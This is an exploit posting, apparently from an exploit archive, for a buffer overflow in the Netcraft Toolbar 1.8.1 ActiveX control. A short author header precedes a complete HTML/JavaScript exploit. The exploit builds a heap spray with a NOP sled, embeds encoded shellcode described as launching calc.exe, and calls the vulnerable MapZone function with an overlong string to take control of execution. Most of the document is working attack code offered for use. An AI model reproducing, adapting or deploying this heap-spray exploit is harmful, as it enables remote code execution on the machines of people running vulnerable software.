Netcraft Toolbar 1.8.1 Code Execution

`<!--  
  
Title: Netcraft Toolbar 1.8.1 Remote Code Execution Exploit  
Date: Nov 23, 2010  
Author: Rew  
Email: rew [splat] leethax.info  
Link: http://toolbar.netcraft.com/install/Netcraft%20Toolbar.msi  
Version: 1.8.1  
Tested on: WinXP - IE 6  
CVE: NA (0day)  
  
This object is NOT marked safe for scripting so the impact of this issue is small. You'll have to  
enable loading of unsafe ActiveX controls to be able to test it.  
  
There is a classic buffer overflow in "%PROGRAMFILES%\Netcraft Toolbar\retrievepage.dll".  
By supplying an overly long string to the MapZone() function we can blah blah blah... this  
has been covered 10000000 times. Our offset is... [75 junk bytes][ebp][eip]. l33th4x iknowright.  
  
NOTE:  
This issue appears to get patched silently after the Netcraft Toolbar loads up in IE. retrievepage.dll  
gets replaced however curiously, both the old and new dlls have the SAME version number (1.0.1.0), and  
there is no indication an update has occured. Maybe Netcraft is trying to hide the vulnerability?  
I dont know. The vulnerable dll is 180KB whereas the patched one is 172KB. Meh, just fyi. Make sure  
it's loading the 180KB one when testing.  
  
much love to irc.rizon.net#beer  
  
PS:  
Any Information Security firms looking for a knowledgeable, motivated intern?  
I sure would love to talk to you.  
  
-->  
  
<object classid='clsid:73F57628-B458-11D4-9673-00A0D212FC63' id='target' /></object>  
  
<script>  
  
// runs calc.exe  
var shellcode = unescape(  
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+  
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+  
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+  
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+  
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+  
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+  
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+  
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'  
);  
  
var nops = unescape('%u9090%u9090');  
var headersize = 20;  
var slackspace = headersize + shellcode.length;  
  
while(nops.length < slackspace) {  
nops += nops;  
}  
  
var fillblock = nops.substring(0, slackspace);  
var block = nops.substring(0, nops.length - slackspace);  
  
while((block.length + slackspace) < 0x50000) {  
block = block + block + fillblock;  
}  
  
// Do a little dance...  
memory=new Array();  
for(counter=0; counter<200; counter++){  
memory[counter] = block + shellcode;  
}   
  
// Make a little love...  
var pwnt = "";  
while(pwnt.length <= 83){  
pwnt += "\x0c";  
}  
  
  
// Get down tonight!  
document.getElementById('target').MapZone( pwnt );  
  
</script>  
  
`